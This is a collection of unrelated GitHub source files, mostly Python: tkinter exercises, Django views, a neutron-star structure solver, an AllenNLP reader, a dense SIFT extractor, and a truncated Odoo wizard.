{"seq_id":"27922475150","text":"from tkinter import *\nimport sqlite3\n\nroot = Tk()\nroot.title(\"Doidera\")\nroot.geometry(\"400x400+200+200\")\n\n# Create the database or connect to an existing one\nconexao = sqlite3.connect(\"Aula019...Banco.db\")\n\n# Create a cursor\ncursor = conexao.cursor()\n\n# Create the table\ncursor.execute(\"\"\"CREATE TABLE enderecos (\nprimeiro_nome text,\nsobrenome text,\nendereco text,\ncidade text,\nestado text,\ncep integer)\"\"\")\n\n# Commit the changes\nconexao.commit()\n\n# Close the connection\nconexao.close()\n\nroot.mainloop()\n","repo_name":"DavidBitner/Aprendizado-Python","sub_path":"Curso/ModuloTkinter/Aula019Databases.py","file_name":"Aula019Databases.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
{"seq_id":"15461959402","text":"from Physical_Const import *\nfrom RK4 import RK4step\nfrom adaptive_step import *\nfrom scipy import integrate, interpolate\n\ndef static(rho0,m0,r0,dr0,nu0,rhoarray,Parray,name,cutoff=0.0):\n    \"\"\"Builds a neutron star model from the initial values y0 and an interpolated EOS. The solver will start\n    in r0 with an arbitrary stepsize dr0 and will stop when the pressure becomes negative.\n    Returns the mass, pressure, density and nu profiles as functions of r. 
The parameter cutoff\n can be provided to stop the integration at the minimum energy density available in the EOS.\"\"\"\n \n def PEoS(rho):\n logP=interpolate.interp1d(np.log10(rhoarray/rhodim),np.log10((Parray*c**2)/Pdim))\n return 10.0**logP(np.log10(rho))\n def rhoEoS(P):\n logrho=interpolate.interp1d(np.log10((Parray*c**2)/Pdim),np.log10((rhoarray/rhodim)))\n return 10.0**logrho(np.log10(P))\n\n \n def TOV(r,y):\n mns, pns, nuns= y\n dmdr=4.0*np.pi*r**2.0*rhoEoS(pns)\n if (1.0-(rhoEoS(pns)/rhoEoS(y0[1])))<(10*epsilon):\n dpdr=-4*np.pi*((pns+rhoEoS(y0[1]))*(rhoEoS(y0[1])/3+pns)/(1-(8*np.pi/3)*r**2*rhoEoS(y0[1])))*r\n #print('h')\n else:\n dpdr=-((4.0*np.pi*r**3.0*pns+mns)*(pns+rhoEoS(pns)))/(r*(r-2.0*mns))\n dnudr=-dpdr/(pns+rhoEoS(pns))\n #print('P',pns*Pdim,'rho',rhoEoS(pns)*rhodim)\n #print('r',r)\n return [dmdr,dpdr,dnudr]\n \n f=open('results/' + name + '/' +str(np.log10(rho0*rhodim))+'.dat','w+')\n #ms=[]; ps=[]; rhos=[]; nus=[]; rs=[] # creating lists to save the solution\n lambdaa=0.0\n f.write(str(m0)+'\\t'+ str(PEoS(rho0))+'\\t'+str(rho0)+'\\t'+str(nu0)+'\\t'+str(lambdaa)+'\\t'+str(r0)+'\\n')\n #ms.append(m0); ps.append(PEoS(rho0)); rhos.append(rho0); nus.append(nu0); rs.append(r0) \n y0=[m0,PEoS(rho0),nu0]\n y=RK4step(TOV,r0,y0,dr0) # first step taken arbitrary (dr0) \n dr=dr0\n r=r0+dr\n lambdaa = 0.5*np.log(1/(1-2*y[0]/r))\n f.write(str(y[0])+'\\t'+ str(y[1])+'\\t'+str(rhoEoS(y[1]))+'\\t'+str(y[2])+'\\t'+str(lambdaa)+'\\t'+str(r)+'\\n')\n #ms.append(y[0]); ps.append(y[1]); rhos.append(rhoEoS(y[1])); nus.append(y[2]); rs.append(r) \n while y[1] > 0.0 and rhoEoS(y[1])*rhodim > cutoff and dr>10*epsilon:\n #print('h2')\n #print('P',y[1],'m',y[0],'r',r,'dr',dr)\n dr=stepsize(y,TOV(r,y))\n y=RK4step(TOV,r,y,dr)\n r=r+dr\n lambdaa = 0.5*np.log(1/(1-2*y[0]/r))\n f.write(str(y[0])+'\\t'+ str(y[1])+'\\t'+str(rhoEoS(y[1]))+'\\t'+str(y[2])+'\\t'+str(lambdaa)+'\\t'+str(r)+'\\n')\n #ms.append(y[0]); ps.append(y[1]); rhos.append(rhoEoS(y[1])); nus.append(y[2]); rs.append(r)\n f.close()\n return np.array([y[0],r])\n\ndef MRrhoc(rhosc,m0,r0,dr0,rhoarray,Parray,name,cutoff=0.0):\n \"\"\"Builds a family of neutron star models from an equation of state P(rho) and rho(P), given a range of central densities rhosc.\n Returns three lists with the values of Rstar (RR) and Mstar (MM) for the corresponding value of rhoc (rhorho).\"\"\"\n #psc=PEoS(rhosc/rhodim) #Range of central pressures\n #MM=[];RR=[];rhorho=[]\n f=open('results/'+name+'/'+'MRrhoc'+'.dat','w+')\n for rhoc in rhosc/rhodim:\n A = static(rhoc,m0,r0,dr0,0.0,rhoarray,Parray,name,cutoff)\n f.write(str(A[1]*rdim*1e-5)+'\\t'+str(A[0]*mdim/Msun)+'\\t'+str(rhoc*rhodim)+'\\n')\n #RR.append(r[-1]*rdim*1e-5); MM.append(m[-1]*mdim/Msun); rhorho.append(rho[0]*rhodim)\n f.close()\n return None#[RR,MM,rhorho]\n","repo_name":"DavidRamosSal/stellar_structure","sub_path":"static_structure.py","file_name":"static_structure.py","file_ext":"py","file_size_in_byte":3461,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"74671987299","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .models import Movie\n# Create your views here.\n\n# def home(request):\n# return HttpResponse('
\n\n    this is home\n\n    ')\n\ndef about(request):\n return HttpResponse('\n\n    this is about\n\n
    ')\n\ndef home(request):\n \n searchTerm = request.GET.get('searchMovie')\n if searchTerm:\n movies = Movie.objects.filter(title__icontains=searchTerm)\n else:\n movies = Movie.objects.all()\n return render(request=request, \n template_name = 'home.html', \n context={'searchTerm':searchTerm, 'movies':movies})\n\ndef signup(request):\n email = request.GET.get('email')\n return render(request=request, \n template_name = 'email.html', \n context={'email':email})\n","repo_name":"Volchenkov90/django___movie","sub_path":"movie/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
{"seq_id":"26344464690","text":"from tkinter import *\nimport pyrebase\n\ndef profil_szerkesztes(jelszo, bio, hely):\n    with open(\"adatok.txt\", \"r\", encoding=\"UTF-8\") as fajl:\n        nev = fajl.readline().strip()\n    print(jelszo, bio, hely, nev)\n    def mentes():\n\n \n        config = {\n            \"apiKey\": \"AIzaSyCsLNLdZWJ5RtPeXSdOraiE83g87HOAW_w\",\n            \"authDomain\": \"authfortkinter.firebaseapp.com\",\n            \"projectId\": \"authfortkinter\",\n            \"databaseURL\": \"https://authfortkinter-default-rtdb.europe-west1.firebasedatabase.app/\",\n            \"storageBucket\": \"authfortkinter.appspot.com\",\n            \"messagingSenderId\": \"132997432044\",\n            \"appId\": \"1:132997432044:web:b3f5e167ae61b0f5c0dbc9\"\n        }\n\n        firebase = pyrebase.initialize_app(config)\n        database = firebase.database()\n\n\n        mentendo = bemutatkoz_ki.get()\n        mentendo_nev = jelszo_ki.get()\n        jelszo_ki.delete(0, END)\n        jelszo_ki.insert(0, mentendo_nev)\n        bemutatkoz_ki.delete(0, END)\n        bemutatkoz_ki.insert(0, mentendo)\n\n        jelszo_eloszor = jelszo_ki.get()\n        jelszo_masodszor = jelszo_ki2.get()\n\n        if jelszo_eloszor != jelszo_masodszor:\n            hiba = \"The two passwords do not match!\"\n        else:\n            if len(jelszo_eloszor) < 8:\n                try:\n                    hiba.destroy()\n                except:\n                    hiba = Label(ablak, fg=\"RED\", text=\"Unfortunately the password is not long enough!\").grid(row=5, column=1, columnspan=3)\n            elif not any(char.isdigit() for char in jelszo_eloszor) or not any(char.isalpha() for char in jelszo_eloszor) or not any(char.isupper() for char in jelszo_eloszor) \\\n                    or jelszo_eloszor.isspace():\n                try:\n                    hiba.destroy()\n                except:\n                    hiba = Label(ablak, fg=\"RED\", text=\"The password is not strong enough!\").grid(row=5, column=1, columnspan=3)\n            else: # at this point the user finally got everything right\n                database.child('Users').child(nev).set(jelszo_eloszor)\n                jelszo_ki.delete(0, END)\n                jelszo_ki2.delete(0, END)\n                sikeres = Label(ablak, fg=\"GREEN\", text=\"Password changed successfully!\").grid(row=5, column=1, columnspan=3)\n\n\n    ablak = Toplevel()\n    ablak.title(\"Profile settings\")\n    ablak.geometry(\"500x400\")\n\n    jelszo = Label(ablak, text=\"New password\")\n    jelszo2 = Label(ablak, text=\"New password again\")\n    jelszo_ki = Entry(ablak, show=\"*\")\n    jelszo_ki2 = Entry(ablak, show=\"*\")\n    bemutatkoz = Label(ablak, text=\"Introduction\")\n\n\n    bemutatkoz_ki = Entry(ablak, text=\"\")\n    bemutatkoz_ki.insert(0, bio)\n\n    szerk = Button(ablak, text=\"Apply 🖊\", command=mentes)\n    ranglista = Label(ablak, text=\"Current leaderboard position:\")\n    ranglista_ki = Label(ablak, text=hely+1)\n\n    jelszo.grid(row=1, column=1)\n    jelszo2.grid(row=2, column=1)\n    jelszo_ki.grid(row=1, column=2)\n    jelszo_ki2.grid(row=2, column=2)\n    bemutatkoz.grid(row=3, column=1)\n    bemutatkoz_ki.grid(row=3, column=2)\n    szerk.grid(row=2, column=3)\n    ranglista.grid(row=4, column=1)\n    ranglista_ki.grid(row=4, 
column=2)","repo_name":"Martinanevem/tkinter","sub_path":"root/profil.py","file_name":"profil.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"16553539846","text":"import os\n\n\n_PREFIX = 'TWCOL_'\n\n\ndef current_env():\n return os.environ.get(_PREFIX + 'ENV', 'dev')\n\n\ndef env(var):\n suffix = {\n 'dev': '_DEV',\n 'stage': '_STAGE',\n 'prod': '_PROD'\n }.get(current_env(), '_DEV')\n\n varname = _PREFIX + var + suffix\n\n if varname not in os.environ:\n raise ValueError(f\"Variable {varname} not found in environment variables\")\n\n return os.environ[varname]\n","repo_name":"zahrevsky/twitter-collector","sub_path":"env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"42261087092","text":"from tkinter import *\r\n\r\ndef click():\r\n name = textbox1.get()\r\n message = str(\"Hello \"+name)\r\n textbox2[\"bg\"] = \"yellow\"\r\n textbox2[\"fg\"] = \"blue\"\r\n textbox2[\"text\"] = message\r\n\r\nwindow = Tk()\r\nwindow.geometry(\"500x200\")\r\n\r\nlabel1 = Label(text = \"Enter your name:\")\r\nlabel1.place(x = 30, y = 20)\r\n\r\ntextbox1 = Entry(text = \"\")\r\ntextbox1.place(x = 150, y = 20, width=200, height=25)\r\ntextbox1[\"justify\"]=\"center\"\r\ntextbox1.focus()\r\n\r\nbutton1 = Button(text = \"Press me\", command = click)\r\nbutton1.place(x = 30, y = 50, width=120, height=25)\r\n\r\ntextbox2 = Message(text = \"\")\r\ntextbox2.place(x = 150, y = 50, width=200, height=25)\r\ntextbox2[\"bg\"] = \"white\"\r\ntextbox2[\"fg\"] = \"black\"\r\n\r\nwindow.mainloop()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#Written by Nichola Lacey and copyright owned by (c) Nichola Wilkin Ltd. 2017\r\n","repo_name":"RachelMurt/Python","sub_path":"Name to empty field.py","file_name":"Name to empty field.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"31964896771","text":"from battery import Battery\r\nfrom ..utility import RoundHalfUpToInt, ConvertFromTimeBlockToHours\r\n\r\nclass NissanLeafBattery(Battery):\r\n kWhPkm = 4.5 #khw/km\r\n \r\n def __init__(self, capacity):\r\n \"\"\" Models the battery of a Nissan Leaf\r\n \"\"\"\r\n super(NissanLeafBattery, self).__init__(capacity)\r\n\r\n def Discharge(self, time, distance):\r\n \"\"\" Calculates the discharge rate of the battery. \r\n \r\n Keyword arguments:\r\n\r\n time -- The duration of the discharge. \r\n \"\"\"\r\n \r\n if type(time) != int:\r\n raise Exception(\"Time must be represented as an integer value!\")\r\n\r\n batteryConsumed = distance / self.kWhPkm\r\n return -batteryConsumed\r\n\r\n def Charge(self, time, load):\r\n \"\"\" Calculates the Charge in a battery after chargeing for a period of time\r\n\r\n Formula:\r\n P = load power divided by 1000 = U (voltage) * I (Amperage) / 1000 = Load in KW\r\n c = power generated in kw\r\n t = time (in hours)\r\n\r\n c = P * t\r\n\r\n Keyword arguments:\r\n\r\n time -- The duration of charging.\r\n load -- The load the charger outputs to the battery. 
\r\n        \"\"\"\r\n\r\n        if type(time) != int:\r\n            raise Exception(\"Time must be represented as an integer value!\")\r\n\r\n        P = load\r\n        t = ConvertFromTimeBlockToHours(time)\r\n        c = RoundHalfUpToInt(t * P)\r\n        return c","repo_name":"ksanman/EvPlannerValueIteration","sub_path":"trip_scheduler/battery/nissan_leaf_battery.py","file_name":"nissan_leaf_battery.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
{"seq_id":"2148554879","text":"from django.shortcuts import render\nfrom django.views.generic import DetailView, ListView, CreateView\nfrom . import models\n\n\nclass PageviewMixin():\n    '''\n    Calls obj.increment_pageview() and obj.save()\n    '''\n    def get_object(self):\n        obj = super().get_object()\n        obj.increment_pageview()\n        obj.save()\n        return obj\n\nclass ReviewDetailView(PageviewMixin, DetailView):\n    model = models.Review\n    context_object_name = 'review'\n    template_name = 'reviews/review_detail.html'\n\n\nclass ReviewListView(ListView):\n    model = models.Review\n    context_object_name = 'review_list'\n    template_name = 'reviews/review_list.html'\n    queryset = (models.Review.objects.all()\n                .exclude(active=False)\n                .order_by('-created'))\n\nclass IssueDetailView(PageviewMixin, DetailView):\n    model = models.Issue\n    context_object_name = 'issue'\n    template_name = 'issues/issue_detail.html'\n\n\nclass IssueListView(ListView):\n    model = models.Issue\n    context_object_name = 'issue_list'\n    template_name = 'issues/issue_list.html'\n    queryset = (models.Issue.objects.all()\n                .exclude(active=False)\n                .order_by('-created'))\n\n\nclass TagListView(ListView):\n    model = models.Tag\n    context_object_name = 'tag_list'\n    template_name = 'tags/tag_list.html'\n    queryset = (models.Tag.objects.all()\n                .exclude(active=False)\n                .order_by('text'))\n\n\nclass TagDetailView(DetailView):\n    model = models.Tag\n    context_object_name = 'tag'\n    template_name = 'tags/tag_detail.html'\n","repo_name":"uppertoe/journal_watch","sub_path":"reviews/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
{"seq_id":"17219274501","text":"from django.core.management.base import BaseCommand, CommandError\nfrom django.conf import settings\nfrom exodus.core.static_analysis import *\nfrom reports.models import *\nimport shutil, os\nimport tempfile\nfrom minio import Minio\nfrom minio.error import (ResponseError)\n\n\nclass Command(BaseCommand):\n    help = 'Refresh all reports'\n\n    def add_arguments(self, parser):\n        parser.add_argument('report_id', nargs='*', type=int)\n\n        parser.add_argument(\n            '--all',\n            action='store_true',\n            dest='all',\n            help='Update all reports',\n        )\n\n    def handle(self, *args, **options):\n        if options['all']:\n            try:\n                reports = Report.objects.order_by('-creation_date')\n            except Report.DoesNotExist:\n                raise CommandError('No reports found')\n        else:\n            try:\n                reports = Report.objects.filter(pk__in=options['report_id'])\n            except Report.DoesNotExist:\n                raise CommandError('No reports found')\n\n        for report in reports:\n            self.stdout.write(\n                self.style.SUCCESS('Start updating report \"%s\"' % report.id))\n            with tempfile.TemporaryDirectory() as tmpdir:\n                decoded_dir = os.path.join(tmpdir, 'decoded')\n                icon_name = '%s_%s.png' % (report.bucket, report.application.handle)\n                apk_name = report.apk_file\n                apk_tmp = os.path.join(tmpdir, apk_name)\n\n                # Download APK from storage\n                minio_client = Minio(settings.MINIO_URL,\n                                     
access_key=settings.MINIO_ACCESS_KEY,\n secret_key=settings.MINIO_SECRET_KEY,\n secure=settings.MINIO_SECURE)\n try:\n data = minio_client.get_object(settings.MINIO_BUCKET, apk_name)\n with open(apk_tmp, 'wb') as file_data:\n for d in data.stream(32 * 1024):\n file_data.write(d)\n except ResponseError as err:\n print(err)\n # Decode APK\n if decodeAPK(apk_tmp, decoded_dir):\n # Refresh trackers\n trackers = findTrackers(decoded_dir)\n # if len(trackers) > len(report.found_trackers.all()):\n print(trackers)\n report.found_trackers = trackers\n report.save()\n self.stdout.write(self.style.SUCCESS('Successfully update trackers list of \"%s\"' % report.application.handle))\n # Refresh icon\n icon_path = getIcon(icon_name, report.application.handle)\n if icon_path != '':\n report.application.icon_path = icon_path\n report.application.save()\n self.stdout.write(self.style.SUCCESS('Successfully update icon of \"%s\"' % report.application.handle))\n\n\n","repo_name":"stonfute/exodus","sub_path":"exodus/reports/management/commands/refreshstaticanalysis.py","file_name":"refreshstaticanalysis.py","file_ext":"py","file_size_in_byte":3026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"} +{"seq_id":"6083715444","text":"print('~' * 30)\r\nprint(\"Painting The Room\".center(30))\r\nprint('~' * 30)\r\n\r\n\r\ndef is_number_l(leng):\r\n try:\r\n float(leng)\r\n return leng\r\n except ValueError:\r\n return False\r\n\r\n\r\ndef is_number_w(wid):\r\n try:\r\n float(wid)\r\n return wid\r\n except ValueError:\r\n return False\r\n\r\n\r\nwhile True:\r\n length = input(\"Wall's length in meters: \")\r\n if is_number_l(length):\r\n break\r\nwhile True:\r\n width = input(\"wall's width in meters: \")\r\n if is_number_w(width):\r\n break\r\n\r\nlength = float(length)\r\nwidth = float(width)\r\nmeasure = length * width\r\npaint = 9\r\nbucket = 1\r\n\r\nwhile paint < measure:\r\n paint += 9\r\n bucket += 1\r\n\r\nprint(f'You have {measure:.2f} meters of wall \\n'\r\n f'and will need purchase {bucket} can of paint')\r\n\r\n","repo_name":"diegoss3d/HundredDaysOfCode","sub_path":"09_Paint_Calculator.py","file_name":"09_Paint_Calculator.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71206346662","text":"import argparse\nimport json\nimport signal\nimport sys\n\nimport yaml\n\nfrom pollect.core.Core import Configuration\nfrom pollect.core.ExecutionScheduler import ExecutionScheduler\nfrom pollect.core.Log import Log\n\n\ndef load_config(config: str):\n if config.endswith('.json'):\n with open(config, 'r') as f:\n return json.load(f)\n if config.endswith('.yml'):\n with open(config, 'r') as f:\n return yaml.safe_load(f)\n\n # File has an unknown or no extension, try all supported formats\n try:\n return load_config(config + '.yml')\n except FileNotFoundError:\n return load_config(config + '.json')\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--version', dest='version', action='store_true',\n help='Prints the current version')\n parser.add_argument('-d', '--debug', dest='debug', action='store_true',\n help='Shortcut for --log-level debug')\n parser.add_argument('--log-level', dest='log_level', default='info',\n choices=['info', 'debug', 'warning', 'error'],\n help=\"Sets the log level, info by default (if --debug isn't set)\")\n parser.add_argument('-c', '--config', dest='config', default='config',\n help='Configuration file which should be read. 
If no file extension is given '\n                             'both (yml and json) will be checked.')\n    parser.add_argument('-r', '--dry-run', dest='dry_run', action='store_true',\n                        help='Prints the probed data to stdout instead of sending it to the writer')\n    args = parser.parse_args()\n\n    if args.version:\n        from pollect import __version__\n        print(f'Pollect {__version__}')\n        return\n\n    log_level = args.log_level\n    if args.debug:\n        log_level = 'debug'\n    Log.setup()\n    Log.set_level(log_level)\n\n    scheduler = None\n\n    def signal_handler(signal, frame):\n        nonlocal scheduler\n        if scheduler is not None:\n            scheduler.stop()\n        sys.exit(0)\n\n    signal.signal(signal.SIGINT, signal_handler)\n\n    raw_config = load_config(args.config)\n    config = Configuration(raw_config, args.dry_run)\n    scheduler = ExecutionScheduler(config, config.create_executors())\n    scheduler.create()\n    scheduler.run()\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"davidgiga1993/pollect","sub_path":"pollect/Pollect.py","file_name":"Pollect.py","file_ext":"py","file_size_in_byte":2376,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"35"}
{"seq_id":"2453490504","text":"# Monkey eating peaches\n'''\nOn the first day a monkey picks some peaches, immediately eats half of them and, still not satisfied, eats one more; on the second morning it eats half of the remaining peaches and again one more.\nEvery following morning it eats half of what was left the previous day plus one. On the morning of the 10th day, wanting to eat again, it finds only one peach left. Find how many peaches were picked on the first day.\n'''\n\n# Iterative solution\ncurrent = 1\nfor day in range(9, 0, -1):\n    yesterday = (current+1)*2\n    current = yesterday\n\nprint(yesterday)\n\n\n# Recursive solution\ndef f(n):\n    if n == 1:\n        return 1\n    else:\n        return (f(n-1)+1)*2\n\n\nprint(f(10))\n","repo_name":"AlwaysOnline233/cookbook","sub_path":"rookie/7猴子吃桃.py","file_name":"7猴子吃桃.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"}
{"seq_id":"10529069566","text":"import pygame\r\nimport tkinter as tk\r\nfrom tkinter import filedialog\r\n\r\n# Initialize the pygame\r\npygame.init()\r\n\r\n# create the UI\r\n\r\nroot = tk.Tk()\r\nroot.title(\"Music Player\")\r\nroot.geometry(\"300x300\")\r\n\r\n\r\n# function to handle file selection\r\ndef select_file():\r\n    file_path = filedialog.askopenfilename()\r\n    pygame.mixer.music.load(file_path)\r\n\r\n\r\n# function to handle play button\r\ndef play_music():\r\n    pygame.mixer.music.play()\r\n\r\n# function to handle pause button\r\n\r\n\r\ndef pause_music():\r\n    pygame.mixer.music.pause()\r\n\r\n# function to handle resume button\r\n\r\n\r\ndef resume_music():\r\n    pygame.mixer.music.unpause()\r\n\r\n# function to handle stop button\r\n\r\n\r\ndef stop_music():\r\n    pygame.mixer.music.stop()\r\n\r\n\r\n# create the buttons\r\nfile_button = tk.Button(root, text=\"Select File \", command=select_file)\r\nfile_button.pack()\r\n\r\nplay_button = tk.Button(root, text=\"Play\", command=play_music)\r\nplay_button.pack()\r\n\r\npause_button = tk.Button(root, text=\"Pause\", command=pause_music)\r\npause_button.pack()\r\n\r\nresume_button = tk.Button(root, text=\"Resume\", command=resume_music)\r\nresume_button.pack()\r\n\r\nstop_button = tk.Button(root, text=\"Stop\", command=stop_music)\r\nstop_button.pack()\r\n\r\n# run the UI loop\r\nroot.mainloop()\r\n\r\n# clean up pygame\r\npygame.quit()\r\n","repo_name":"sanju50201/Complete-Python-Projects","sub_path":"Set 1/py/music_player.py","file_name":"music_player.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
{"seq_id":"13451983213","text":"def printing(data, languages_count):\n    print(\"Results:\")\n    for users_dict in 
data.values():\n for user, score in users_dict.items():\n print(f\"{user} | {score}\")\n\n print(f\"Submissions:\")\n for lang, count in languages_count.items():\n print(f\"{lang} - {count}\")\n\n\ndef creating_data(user_input, languages_count, data):\n username, language, points = user_input.split(\"-\")\n points = int(points)\n if language not in languages_count:\n languages_count[language] = 1\n else:\n languages_count[language] += 1\n if language not in data:\n data[language] = {username: points}\n else:\n if username not in data[language]:\n data[language][username] = points\n else:\n if points > data[language][username]:\n data[language][username] = points\n return data, languages_count\n\n\ndef removing_user(user_input, data):\n username = user_input.split(\"-\")[0]\n for users in data.values():\n if username in users.keys():\n del users[username]\n return data\n\n\nuser_input = input()\ndata = {}\nlanguages_count = {}\nwhile not user_input == \"exam finished\":\n if \"banned\" not in user_input:\n data, languages_count = creating_data(user_input, languages_count, data)\n else:\n data = removing_user(user_input, data)\n\n user_input = input()\n\nprinting(data, languages_count)\n","repo_name":"astankin/Python-Fundamentals","sub_path":"Dictionaries2022/12.SoftUni Exam Results.py","file_name":"12.SoftUni Exam Results.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14067379980","text":"from typing import Dict, Iterable, List\n\nfrom allennlp.data import DatasetReader, Instance\nfrom allennlp.data.fields import SequenceLabelField, TextField\nfrom allennlp.data.token_indexers import TokenIndexer, SingleIdTokenIndexer\nfrom allennlp.data.tokenizers import Token, Tokenizer, WhitespaceTokenizer\n\n\n@DatasetReader.register(\"classification-csv\")\nclass ClassificationCsvReader(DatasetReader):\n def __init__(\n self,\n tokenizer: Tokenizer = None,\n token_indexers: Dict[str, TokenIndexer] = None,\n max_tokens: int = None,\n **kwargs\n ):\n super().__init__(**kwargs)\n self.tokenizer = tokenizer or WhitespaceTokenizer()\n self.token_indexers = token_indexers or {\"tokens\": SingleIdTokenIndexer()}\n self.max_tokens = max_tokens\n\n def text_to_instance(self, text: str, label: str = None) -> Instance:\n tokens = self.tokenizer.tokenize(text)\n if self.max_tokens:\n tokens = tokens[: self.max_tokens]\n text_field = TextField(tokens, self.token_indexers)\n fields = {\"tokens\": text_field}\n if label.strip():\n fields[\"tags\"] = SequenceLabelField(label.split(\" \"), text_field, \"labels\")\n return Instance(fields)\n\n def _read(self, file_path: str) -> Iterable[Instance]:\n with open(file_path, \"r\") as lines:\n for line in lines:\n url, text, sentiment = line.split(\",\")\n yield self.text_to_instance(text, sentiment)","repo_name":"naoki-shigehisa/learning_AllenNLP","sub_path":"work/test/text_classifier/dataset_readers/.ipynb_checkpoints/classification_csv-checkpoint.py","file_name":"classification_csv-checkpoint.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"23657090015","text":"import numpy as np\nimport cv2\n\nclass DenseSIFT(object):\n\tdef __init__(self):\n\t\tself.sift = cv2.xfeatures2d.SIFT_create(nfeatures=1)\n\n\tdef detectAndCompute(self, image, step_size=12, window_size=(10, 10)): # 12 10\n\t\tif window_size is None:\n\t\t\twinH, winW = 
image.shape[:2]\n\t\t\twindow_size = (winW // 4, winH // 4)\n\n\t\tif image.ndim == 3:\n\t\t\timage = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\n\n\t\tdescriptors = np.array([], dtype=np.float32).reshape(0, 128)\n\t\tkeypoints = []\n\t\tfor cropinfo in self._crop_image(image, step_size, window_size):\n\t\t\t# crops_x, crops_y, crop = cropinfo\n\t\t\tcrop_x = cropinfo[0]\n\t\t\tcrop_y = cropinfo[1]\n\t\t\tcrop = cropinfo[2]\n\t\t\ttmp_keypoints, tmp_descriptor = self.sift.detectAndCompute(crop, None)\n\t\t\t# tmp_keypoints, tmp_descriptor = self._detectAndCompute(crop)\n\t\t\t# tmp_descriptor = self._detectAndCompute(crop)[1]\n\t\t\tif tmp_descriptor is None:\n\t\t\t\tcontinue\n\t\t\tdescriptors = np.vstack([descriptors, tmp_descriptor])\n\n\t\t\tfor i in range(0,len(tmp_keypoints)):\n\t\t\t\ttmp_keypoints[i].pt = [tmp_keypoints[i].pt[0] + crop_y, tmp_keypoints[i].pt[1] + crop_x]\n\n\t\t\tkeypoints = keypoints + tmp_keypoints\n\t\t\t# keypoints.append(tmp_keypoints)\n\t\t\t# keypoints = np.vstack([keypoints, tmp_keypoints])\n\t\treturn keypoints, descriptors\n\n\t# def _detect(self, image):\n\t# \treturn self.sift.detect(image)\n\t#\n\t# def _compute(self, image, kps, eps=1e-7):\n\t# \tkps, descs = self.sift.compute(image, kps)\n\t#\n\t# \tif len(kps) == 0:\n\t# \t\treturn [], None\n\t#\n\t# \tdescs /= (descs.sum(axis=1, keepdims=True) + eps)\n\t# \tdescs = np.sqrt(descs)\n\t# \treturn kps, descs\n\t#\n\t# def _detectAndCompute(self, image):\n\t# \tkps = self._detect(image)\n\t# \treturn self._compute(image, kps)\n\n\tdef _sliding_window(self, image, step_size, window_size):\n\t\tfor y in range(0, image.shape[0], step_size):\n\t\t\tfor x in range(0, image.shape[1], step_size):\n\t\t\t\tyield (x, y, image[y:y + window_size[1], x:x + window_size[0]])\n\n\tdef _crop_image(self, image, step_size, window_size):\n\t\t# crops = []\n\t\t# crops_x = []\n\t\t# crops_y = []\n\t\tcrops_info= []\n\t\twinH, winW = window_size\n\t\tfor (x, y, window) in self._sliding_window(image, step_size=step_size, window_size=(winW, winH)):\n\t\t\tif window.shape[0] != winH or window.shape[1] != winW:\n\t\t\t\tcontinue # skip the leftover window at the edge if it is not full-sized\n\n\t\t\tcrops_infotemp =[x,y,np.array(window)]\n\t\t\tcrops_info.append(crops_infotemp)\n\t\t\t# crops.append(window)\n\t\t\t# crops_x.append(x)\n\t\t\t# crops_y.append(y)\n\n\t\treturn crops_info","repo_name":"VictorCSheng/SSET","sub_path":"csutil/densesift.py","file_name":"densesift.py","file_ext":"py","file_size_in_byte":2411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
{"seq_id":"27168944280","text":"from odoo import models, fields, api\nimport base64\nimport logging\nimport time\n\n_logger = logging.getLogger(__name__)\n\n\nclass ConsolidatedJournal(models.TransientModel):\n    _name = \"sunat.consolidated_journal\"\n    _description = \"Consolidated Journal\"\n\n    date_month = fields.Selection(string=\"Month\", selection=[('01', 'January'),\n                                                             ('02', 'February'),\n                                                             ('03', 'March'),\n                                                             ('04', 'April'),\n                                                             ('05', 'May'),\n                                                             ('06', 'June'),\n                                                             ('07', 'July'),\n                                                             ('08', 'August'),\n                                                             ('09', 'September'),\n                                                             ('10', 'October'),\n                                                             ('11', 'November'),\n                                        